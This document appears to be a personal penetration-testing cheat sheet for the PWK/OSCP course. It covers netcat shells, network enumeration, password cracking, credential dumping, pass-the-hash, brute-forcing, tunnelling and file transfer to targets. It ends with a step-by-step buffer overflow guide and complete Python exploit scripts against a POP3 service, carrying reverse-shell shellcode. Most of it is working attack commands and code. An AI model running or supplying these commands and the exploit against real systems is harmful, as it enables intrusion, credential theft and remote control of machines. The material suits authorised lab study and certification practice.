\
PWK Cheat sheet
NETCAT
nc -lvp 8080
nc -nv 192.168.0.1 8080
nc -lvp 8080 -e cmd.exe/ /bin/bash
nc -nv 192.168.0.1 8080 -e /cmd/ /bin/bash
netcat -lvp 8080 -e cmd.exe --allow 192.168.0.1 --ssl
netcat -v 192.168.0.2 8080 --ssl
ZONE TRNSFR
--- get ns servers
host -l domain.com ns1.domain.com
SMB
--- on ports 139, 445
nbtscan 192.168.0.1-255 ----->scan for smb shares
rpcclient -U "" 192.168.0.1 ------>connect to null share (enter blank paswsword)
-- then srvinfo / enumdomusers / getdompwinfo /
enum4linux -v 192.168.0.1 ----> SMB extracted data from an IP
--- NSE script for SMB
SMTP enum.
VRFY username ---> verify username
bash script~#> for i in (cat usernames); do echo VRFY $I |nc -nv -w 1 192.168.0.1 25 2>/dev/null |grep ^"250"; done
SNMP
nmap -sU --open p 161 192.168.0.1-255 --open
onesixtyone -c comunity.dic -i iplist.txt
snmpwalk -c community.string -v1 192.168.0.1 (add specific mib at the end of command like 1.3.6.1.1.25.4.2...)
--- also try snmpenum
=-=-=-=-=-=-=
PASSWORD CRACKING
/usr/share/wordlists (kali location)
crunch 6 6 1234567890ABCDEF -o list.txt( create psswd list with this criteria)
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mix.txt ( 4 chars mixed alpha from crunch charset list)
crunch 8 8 -t ,@@^^%%% (8 char password 2 alpha 2 sec chars three numeric (very large file))
pwdump (lsas pwd hashes extractor - must be local admin)
fgdump (windows based pswd NTLM hash dump - must be local admin)
wce.exe -w (windows credentials editor
john hashesfile.txt (john bruteforce)
--- pass the hashe
pth - (pass the hash tools list)
export SMBHASH=hasheedntlmpassword:hashedntlmpassword
pth-winexe -U Administrator% //192.168.0.1 cmd
-- scrape website for passwords
cewl www.domain.com -m 6 -w /root/domain-cewl.txt (profile company website for keywords)
john (use john the ripper to create custom psswd list based on extract cewl passwords)
- edit /etc/john/john.conf (example custom rule: $[0-9]$[0-9] - append two digits at the end)
john --wordlist=cewl-extracted.lst --rules --stdout > mutated.txt (create mutated password list)
--- online cracking
medusa -h 192.168.0.1 -u admin -P password.lst -M http -m DIR:/admin -T 20 ( admin folder protected by HTACCESS with 20 threads)
ncrack -v -f --user administrator -P password.lst rdp://192.168.0.1,CL=1 (bruteforce rdp protocol)
hydra -l admin -P password.lst -v 192.168.0.1 ftp (bruteforce ftp service)
hydra 192.168.1.1 -l admin -P /usr/share/wordlists/passwords.txt http-get "/admin/login.php?user=^USER^&pw=^PASS^:bad password"
=-=-=-=-=-=-=
PORT FORWARDING
--- rinetd (set config then restart service)
/etc/rinetd.conf
# bindaddress bindport connectaddress connectport
192.168.0.1 80 172.16.0.1 3389
(listening ip) (listn port) (forward to ip)(forward to port)
(use mstsc to connect to listen ip on liste port)
SSH TUNNELING
-- reverse ssh tunnel
"from compromised machine" (for example from a reverse tcp shell to windows host via msf or nc -l)
ssh to linux svr (plink.exe is windows ssh client in this case)
plink.exe -l root -pw password 192.168.0.1 -R 3390:127.0.0.1:3389 (port: to forward on localhost :port to forward to on this host)
- then on linux, rdp to localhost:3390
SSH DYNAMIC PORT FORWARDING
-- socks proxy
ssh -D 8080 root@openssh.domain.com (local addresses are 172.16.0.1-254 "example")
- now use proxychains
in /etc/proxychains.conf: (under [proxy list])
socks4 127.0.0.1 8080 (port from dynamic port forward tunnel)
-then
proxychains nmap -A 172.16.0.1 (local address range of the network in domain.com) -or-
proxychains rdesktop 172.16.0.1
-----------------------------------------------------
FILE TRANSFER - to target
-----------------------------------------------------
TFTP
-install tftp server
>apt-get install tftpd
-edit tftp config
> vi /etc/xinetd.d/tftp
"..
service tftp
{
protocol = udp
port = 69
socket_type = dgram
wait = yes
user = nobody
server = /usr/sbin/in.tftpd
server_args = /root/tftproot
disable = no
}
.."
-restat xinetd service
>service xinetd restart
-- FROM TARGET MACHINE
>tftp -i 127.0.0.1 GET file.exe (windows. make sure -i (bin) is used or downloaded file will not run)
-----------------------------------------------------
EXPLOIT CREATION - buffer overflow
-----------------------------------------------------
/python scripts at the end/
1. fuzz to find crashable parameter and length of buffer
2. python script to send a single BO string
3. identify what overwrites EIP - /usr/share/metasploit-framework/tools/pattern_create.rb -l "string length"
4. identify location of EIP /usr/share/metasploit-framework/tools/pattern_offset.rb -q "hex chars currently in EIP"
5. create a new buffer with "A" * location length from above + "B" * 4 + "C" * pad till full buffer from step 2
6. find buffer length for shellcode - pad "C" more upto and above of length of shellcode
7. identify bad characters
8. find an instruction whose memory address does not change
-- use MONA (!mona modules)
-- find module that does not use DEP,ASLR or others
-- find address for JMP ESP in module found above : !mona find -s “\xff\e4″ -m [DLL/EXE with no/low security]
-- find JMP ESP instruction in the new .dll
-- [e] looking for that module and double-click to load
-- search for "jmp esp" or sequence: " push esp / retn"
-- if search did not find:
-- use ruby /usr/share/metasploit-framework/tools/nasm_shell.rb
-- search for opcode for "jmp esp" ( "FFE4") ( nasm > jmp esp )
-- !mona find -s "\xff\xe4" -m "module found previously.dll"
--find address withough "bad" characters -> copy address
-- go to that address to verify then use that address to jump to
-- use go to address button, paste address (may have to do search twice)
-- verify that instruction is jmp esp
9. modify exploit code replacing "B" with the new address (IN REVERSE ORDER! - \xDD\xCC\xBB\xAA")
-- ensure that jmp esp instruction jumped the instructions to ESP and ESP point to the top of our future shellcode (beginning of "CCC")
10. create shellcode
-- msfvenom -p windows/shell_reverse_tcp LHOST=192.168.184.128 LPORT=443 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
-- (reverse shell to 443 on attackers machine format layout "C" 32bit system and "windows" platform, no bad characters encode with shikata_ga_nai)
-- insert shellcode and add some NOPs at the beginning to account for encoded shell code decoding
EXPLOIT PYTHON
----fuzzing----
fuzz.py
#!/usr/bin/python
import socket
# Create an array of buffers, from 1 to 5900, with increments of 200.
buffer=["A"]
counter=100
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print "Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.12.117',110))
s.recv(1024)
s.send('USER test\r\n')
s.recv(1024)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
---buffer search---
buffer-search.py
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "A" * 2606 + "B" * 4 + "C" * (3500-2606-4)
#'A' * 2700
try:
print "\nSending Evil Buffer ... "
s.connect(('10.11.12.117',110))
data = s.recv(1024)
s.send('USER hacker' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to server!"
# s.close()
--JMP ESP code----
exploit-jmp-esp.py
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#5F4A358F FFE4 JMP ESP
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * (3500-2606-4)
# address is reversed !
#'A' * 2700
try:
print "\nSending Evil Buffer ... "
s.connect(('10.11.12.117',110))
data = s.recv(1024)
s.send('USER hacker' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to server!"
# s.close()
---------search for potential bad characters------------
exploit-hex-badchars.py
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )
buffer = "A" * 2606 + "B" * 4 + badchars
# removed \x0a as "carriage return" is bad
# removed \x0d as bad
#'A' * 2700
try:
print "\nSending Evil Buffer ... "
s.connect(('10.11.12.117',110))
data = s.recv(1024)
s.send('USER hacker' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to server!"
# s.close()
----------final exploit------------
exploit.py
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#5F4A358F FFE4 JMP ESP
shellcode = (
"\xd9\xf7\xbe\x6c\xf0\x1b\xd6\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x83\xe8\xfc\x31\x70\x13\x03\x1c\xe3\xf9\x23\x20\xeb\x7c"
"\xcb\xd8\xec\xe0\x45\x3d\xdd\x20\x31\x36\x4e\x91\x31\x1a\x63"
"\x5a\x17\x8e\xf0\x2e\xb0\xa1\xb1\x85\xe6\x8c\x42\xb5\xdb\x8f"
"\xc0\xc4\x0f\x6f\xf8\x06\x42\x6e\x3d\x7a\xaf\x22\x96\xf0\x02"
"\xd2\x93\x4d\x9f\x59\xef\x40\xa7\xbe\xb8\x63\x86\x11\xb2\x3d"
"\x08\x90\x17\x36\x01\x8a\x74\x73\xdb\x21\x4e\x0f\xda\xe3\x9e"
"\xf0\x71\xca\x2e\x03\x8b\x0b\x88\xfc\xfe\x65\xea\x81\xf8\xb2"
"\x90\x5d\x8c\x20\x32\x15\x36\x8c\xc2\xfa\xa1\x47\xc8\xb7\xa6"
"\x0f\xcd\x46\x6a\x24\xe9\xc3\x8d\xea\x7b\x97\xa9\x2e\x27\x43"
"\xd3\x77\x8d\x22\xec\x67\x6e\x9a\x48\xec\x83\xcf\xe0\xaf\xcb"
"\x3c\xc9\x4f\x0c\x2b\x5a\x3c\x3e\xf4\xf0\xaa\x72\x7d\xdf\x2d"
"\x74\x54\xa7\xa1\x8b\x57\xd8\xe8\x4f\x03\x88\x82\x66\x2c\x43"
"\x52\x86\xf9\xc4\x02\x28\x52\xa5\xf2\x88\x02\x4d\x18\x07\x7c"
"\x6d\x23\xcd\x15\x04\xde\x86\x13\xd2\xe0\x1b\x4c\xe6\xe0\xa2"
"\x37\x6f\x06\xce\x57\x26\x91\x67\xc1\x63\x69\x19\x0e\xbe\x14"
"\x19\x84\x4d\xe9\xd4\x6d\x3b\xf9\x81\x9d\x76\xa3\x04\xa1\xac"
"\xcb\xcb\x30\x2b\x0b\x85\x28\xe4\x5c\xc2\x9f\xfd\x08\xfe\x86"
"\x57\x2e\x03\x5e\x9f\xea\xd8\xa3\x1e\xf3\xad\x98\x04\xe3\x6b"
"\x20\x01\x57\x24\x77\xdf\x01\x82\x21\x91\xfb\x5c\x9d\x7b\x6b"
"\x18\xed\xbb\xed\x25\x38\x4a\x11\x97\x95\x0b\x2e\x18\x72\x9c"
"\x57\x44\xe2\x63\x82\xcc\x12\x2e\x8e\x65\xbb\xf7\x5b\x34\xa6"
"\x07\xb6\x7b\xdf\x8b\x32\x04\x24\x93\x37\x01\x60\x13\xa4\x7b"
"\xf9\xf6\xca\x28\xfa\xd2")
buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C" * (3500-2606-4-351-16)
# address is reversed !
#'A' * 2700
try:
print "\nSending Evil Buffer ... "
s.connect(('10.11.12.117',110))
data = s.recv(1024)
s.send('USER hacker' + '\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:
print "Could not connect to server!"
# s.close()